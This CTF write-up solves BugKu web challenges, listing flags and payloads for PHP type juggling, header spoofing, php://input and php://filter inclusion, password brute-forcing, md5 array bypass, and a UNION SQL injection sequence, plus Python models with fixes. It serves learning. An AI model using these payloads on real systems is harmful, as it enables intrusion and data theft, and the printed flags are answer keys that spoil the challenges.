Full web review. I set myself a goal: finish the BugKu web challenges by the day after tomorrow, then start on reversing.

Key techniques from this set:
- PHP == (loose comparison) converts both operands to a common type before comparing, so values of different types can compare equal.
- X-Forwarded-For: 127.0.0.1 to pass checks that trust the client IP taken from that header.
- php://input, with <?php echo system('ls');?> as the request body, to execute code through a file inclusion.
- php://filter/read=convert.base64-encode/resource=index.php to read PHP source through a file inclusion as base64 instead of executing it.

https://ctf.bugku.com/challenges#web2
https://ctf.bugku.com/challenges#计算器
flag{CTF-bugku-0032}
https://ctf.bugku.com/challenges#web基础$_GET
?what=flag
The page outputs the flag: flag{bugku_get_su8kej2en}
https://ctf.bugku.com/challenges#web基础$_POST
POST body: what=flag
The response contains the flag: flag{bugku_get_ssseint67se}
https://ctf.bugku.com/challenges#矛盾
num=1qwk
1qwk is not a numeric string, but under PHP's loose == it still compares equal to 1 (PHP 7 reads the leading digit), which gives the flag: flag{bugku-789-ps-ssdf}
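As an added example (not from the original writeup), here is a Python model of the PHP loose-comparison rule that the == note above and the num=1qwk payload rely on. The challenge source is not on this page, so contradiction_check() is an assumption about the usual shape of that check (reject numeric input, then compare with == against 1); loose_eq() models PHP's documented == behaviour for int/string and string/string operands in both PHP 7 and PHP 8, so it also covers the "0e..." numeric-string case that comes up in md5 challenges.

```python
import re

# Grammar of a PHP numeric string (surrounding whitespace tolerated).
_NUMERIC = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?\s*$")
# A leading numeric prefix, as used by PHP 7 when converting a string to a number.
_LEADING = re.compile(r"^\s*[+-]?(\d+(\.\d*)?|\.\d+)([eE][+-]?\d+)?")


def is_numeric(value):
    """Model of PHP is_numeric(): ints, floats, and fully numeric strings."""
    if isinstance(value, bool):
        return False
    if isinstance(value, (int, float)):
        return True
    return isinstance(value, str) and _NUMERIC.match(value) is not None


def loose_eq(a, b, php8=False):
    """Model of PHP's == for number/string operands.

    PHP 7: a number compared with a string converts the string using its leading
    numeric prefix (no prefix -> 0), so 1 == "1qwk" and 0 == "abc" are true.
    PHP 8: if the string is not numeric, the number is cast to a string and the
    two are compared as strings, so 1 == "1qwk" is false.
    Two numeric strings are compared as numbers in both versions ("0e1" == "0e2").
    """
    if isinstance(a, str) and isinstance(b, str):
        if _NUMERIC.match(a) and _NUMERIC.match(b):
            return float(a) == float(b)
        return a == b
    if isinstance(a, str):
        a, b = b, a  # normalise to (number, string)
    if isinstance(a, (int, float)) and isinstance(b, str):
        if php8 and not _NUMERIC.match(b):
            return str(a) == b
        m = _LEADING.match(b)
        number = float(m.group(0)) if m else 0.0
        return number == a
    return a == b


def contradiction_check(num, php8=False):
    """Assumed shape of the challenge check: non-numeric input that still == 1 (hypothetical)."""
    return (not is_numeric(num)) and loose_eq(num, 1, php8=php8)


if __name__ == "__main__":
    for candidate in ("1", "1qwk", "abc"):
        print(candidate, "php7:", contradiction_check(candidate), "php8:", contradiction_check(candidate, php8=True))
```

The same payload that passes on PHP 7 fails on PHP 8, which is why the version of the target matters when reusing this trick.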
https://ctf.bugku.com/challenges#web3
KEY{J2sa42ahJK-HS11III}
https://ctf.bugku.com/challenges#域名解析
Visit http://123.206.87.240/ and use HackBar to set the Host header to flag.baidu.com; the response contains KEY{DSAHDSJ82HDS2211}
https://ctf.bugku.com/challenges#你必须让他停下
flag{dummy_game_1s_s0_popular}
https://ctf.bugku.com/challenges#本地包含
https://ctf.bugku.com/challenges#变量1
    <?php
    error_reporting(0);
    include "flag1.php";
    highlight_file(__file__);
    if(isset($_GET['args'])){
        $args = $_GET['args'];
        if(!preg_match("/^\w+$/",$args)){
            die("args error!");
        }
        eval("var_dump($$args);");
    }
    ?>
The regex only allows word characters, but $$args is a variable variable, so the name of any global can be passed through it.
?args=GLOBALS
This runs var_dump($GLOBALS), which dumps every global, including what flag1.php defined: flag{92853051ab894a64f7865cf3c2128b34}
https://ctf.bugku.com/challenges#web5
ctf{whatfk}
https://ctf.bugku.com/challenges#头等舱
flag{Bugku_k8_23s_istra}
https://ctf.bugku.com/challenges#网站被黑
dirb http://123.206.87.240:8002/webshell/
It finds shell.php, which asks for a password. Guessing common weak passwords did not work, so brute-force it: the password is hack.
Entering it gives the flag: flag{hack_bug_ku035}
https://ctf.bugku.com/challenges#管理员系统
dGVzdDEyMw== is base64; decoding it gives test123, probably the password.
Add X-Forwarded-For: 127.0.0.1 to the request, and the flag comes back: 85ff2ee4171396724bae20c0bd851f6b
https://ctf.bugku.com/challenges#web4
    function checkSubmit(){
        var a=document.getElementById("password");
        if("undefined"!=typeof a){
            if("67d709b2b54aa2aa648cf6e87a7114f1"==a.value) return!0;
            alert("Error");
            a.focus();
            return!1
        }
    }
    document.getElementById("levelQuest").onsubmit=checkSubmit;
The check is entirely client-side: the password field is compared against the literal 67d709b2b54aa2aa648cf6e87a7114f1.
1466644826
Submit that value as the password: KEY{J22JK-HS11}
https://ctf.bugku.com/challenges#flag在index里
http://123.206.87.240:8005/post/index.php?file=show.php
The redirect target looks familiar: file=show.php is a file inclusion. php://input seemed to be filtered, so I tried php://filter/read=convert.base64-encode/resource=index.php instead. That returned the source as base64; decoding it gives the flag: flag{edulcni_elif_lacol_si_siht}
https://ctf.bugku.com/challenges#输入密码查看flag
flag{bugku-baopo-hah}
https://ctf.bugku.com/challenges#点击一百万次
https://ctf.bugku.com/challenges#备份是个好习惯
[empty password]
What is this? Oh, it is the same md5 hash shown twice. The title says backup, so try .bak, .swp and similar; requesting index.php.bak downloads the source:
    <?php
    /**
     * Created by PhpStorm.
     * User: Norse
     * Date: 2017/8/6
     * Time: 20:22
     */
    include_once "flag.php";                       // pull in the flag
    ini_set("display_errors", 0);                  // no error output
    $str = strstr($_SERVER['REQUEST_URI'], '?');   // take everything from the '?' on
    $str = substr($str,1);                         // drop the '?'
    $str = str_replace('key','',$str);             // strip the string "key" once; bypass by doubling it: kekeyy collapses to key
    parse_str($str);                               // register the query string as variables, overwriting any with the same name
    echo md5($key1);
    echo md5($key2);                               // these are the two md5 values shown on the page
    if(md5($key1) == md5($key2) && $key1 !== $key2){
        // condition for the flag: key1 and key2 differ but their md5 values are equal. That is out of reach with
        // ordinary strings here, but md5() of an array returns false, and false == false, so two different arrays pass.
        echo $flag."got flag";
    }
    ?>
http://123.206.87.240:8002/web16/index.php?kekeyy1[]=1&kekeyy2[]=2
Bugku{OH_YOU_FIND_MY_MOMY}
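An added example, not the challenge's code: a Python model of the three pieces the backup-file source combines, the single-pass str_replace that the doubled kekeyy defeats, parse_str turning name[]=v into an array, and md5() returning false on an array so that two different arrays satisfy the == check. parse_php_str and php_md5 are approximations of the PHP builtins written for this example; recursive_filter is a hardened variant added for contrast and is not on the page.

```python
import hashlib
from urllib.parse import parse_qs


def php_like_filter(query):
    """Single-pass str_replace('key', '', $str), as in the challenge source."""
    return query.replace("key", "")


def recursive_filter(query):
    """Hardened variant: strip until nothing changes, so 'kekeyy' cannot rebuild 'key'."""
    while "key" in query:
        query = query.replace("key", "")
    return query


def parse_php_str(query):
    """Approximation of parse_str(): name[]=v yields a list, name=v a string (last wins)."""
    variables = {}
    for name, values in parse_qs(query, keep_blank_values=True).items():
        if name.endswith("[]"):
            variables[name[:-2]] = values
        else:
            variables[name] = values[-1]
    return variables


def php_md5(value):
    """Model of PHP md5(): a string hashes normally; an array makes md5() return false."""
    if isinstance(value, list):
        return False
    return hashlib.md5(value.encode()).hexdigest()


def check(query, filt=php_like_filter):
    """True when the challenge condition md5($key1) == md5($key2) && $key1 !== $key2 holds."""
    variables = parse_php_str(filt(query))
    key1, key2 = variables.get("key1"), variables.get("key2")
    if key1 is None or key2 is None:
        return False
    # PHP's false == false is true, which is exactly what two md5(array) calls produce.
    return php_md5(key1) == php_md5(key2) and key1 != key2


if __name__ == "__main__":
    for q in ("key1[]=1&key2[]=2", "kekeyy1[]=1&kekeyy2[]=2", "kekeyy1=abc&kekeyy2=abc"):
        print(q, "->", check(q), "| recursive filter:", check(q, recursive_filter))
```

The array trick works because the condition compares the md5 results loosely; a strict === on the hashes, or rejecting non-string input before hashing, would close it, and the recursive filter closes the doubled-keyword bypass independently.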
https://ctf.bugku.com/challenges#成绩单
The payloads below use %23 (#) as a comment to drop the rest of the query.
id=1
Normal output.
id=1' ^(1)%23
No output.
id=1' ^(0)%23
Normal output. The XOR flips the WHERE condition, so the id parameter is injectable.
1' ORDER BY 4%23
Normal output.
1' ORDER BY 5%23
Error, so the query returns 4 columns.
0' UNION SELECT 1,2,3,4%23
Normal output, and each number shows where that column is rendered on the page: one slot per column.
id=0' UNION SELECT database(),2,3,4%23
Database name: skctf_flag
id=0' UNION SELECT database(),(SELECT GROUP_CONCAT(table_name) FROM information_schema.TABLES WHERE table_schema='skctf_flag'),3,4%23
Tables in skctf_flag: fl4g, sc
id=0' UNION SELECT database(),(SELECT GROUP_CONCAT(column_name) FROM information_schema.COLUMNS WHERE table_name='fl4g'),3,4%23
Columns in fl4g: skctf_flag
id=0' UNION SELECT database(),(SELECT GROUP_CONCAT(skctf_flag) FROM skctf_flag.fl4g),3,4%23
Data in column skctf_flag, which is the flag: BUGKU{Sql_INJECT0N_4813drd8hz4}
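An added example, not part of the writeup: the same enumeration sequence run against a constructed SQLite database that reuses the writeup's table and column names. SQLite stands in for MySQL, so the comment is -- instead of #, the XOR probe becomes AND 1=1 / AND 1=0, and sqlite_master and pragma_table_info replace information_schema; the sample rows and the flag value are made up. safe_lookup shows the parameterised query under which the same payloads are inert.

```python
import sqlite3

FLAG = "BUGKU{constructed_flag_for_this_example}"  # constructed, not the real flag


def build_db():
    """Constructed stand-in for the challenge database (table and column names from the writeup)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE sc (id INTEGER, name TEXT, english INTEGER, math INTEGER);
        INSERT INTO sc VALUES (1, 'alice', 90, 85), (2, 'bob', 70, 60);
        CREATE TABLE fl4g (skctf_flag TEXT);
        INSERT INTO fl4g VALUES ('{FLAG}');
    """)
    return conn


def vulnerable_lookup(conn, user_id):
    """The injectable pattern: the id parameter is concatenated into the SQL string."""
    sql = f"SELECT id, name, english, math FROM sc WHERE id='{user_id}'"
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError:
        return None  # corresponds to the "error" responses in the writeup


def safe_lookup(conn, user_id):
    """Parameterised version: a payload is just a string that matches no id."""
    return conn.execute(
        "SELECT id, name, english, math FROM sc WHERE id=?", (user_id,)
    ).fetchall()


def is_injectable(conn):
    """Boolean probe: a true condition keeps the row, a false one removes it."""
    true_rows = vulnerable_lookup(conn, "1' AND 1=1--")
    false_rows = vulnerable_lookup(conn, "1' AND 1=0--")
    return bool(true_rows) and not false_rows


def find_column_count(conn, max_cols=16):
    """ORDER BY n succeeds up to the column count and errors one past it."""
    for n in range(1, max_cols + 1):
        if vulnerable_lookup(conn, f"1' ORDER BY {n}--") is None:
            return n - 1
    return None


def union_extract(conn, expr, ncols):
    """Place expr in the first column of a UNION SELECT padded to ncols columns."""
    filler = "".join(f",{i}" for i in range(2, ncols + 1))
    rows = vulnerable_lookup(conn, f"0' UNION SELECT {expr}{filler}--")
    return rows[0][0] if rows else None


def enumerate_flag(conn):
    """The writeup's sequence: column count, then tables, columns and data via the catalogue."""
    ncols = find_column_count(conn)
    tables = union_extract(
        conn, "(SELECT group_concat(name) FROM sqlite_master WHERE type='table')", ncols)
    columns = union_extract(
        conn, "(SELECT group_concat(name) FROM pragma_table_info('fl4g'))", ncols)
    flag = union_extract(conn, f"(SELECT group_concat({columns}) FROM fl4g)", ncols)
    return ncols, tables, columns, flag


if __name__ == "__main__":
    db = build_db()
    print("injectable:", is_injectable(db))
    print("columns, tables, fl4g columns, flag:", enumerate_flag(db))
    print("safe lookup with payload:", safe_lookup(db, "0' UNION SELECT 1,2,3,4--"))
```

The column-count probe and the UNION padding are the two steps that carry over unchanged to any SQL dialect; only the catalogue tables and comment syntax change.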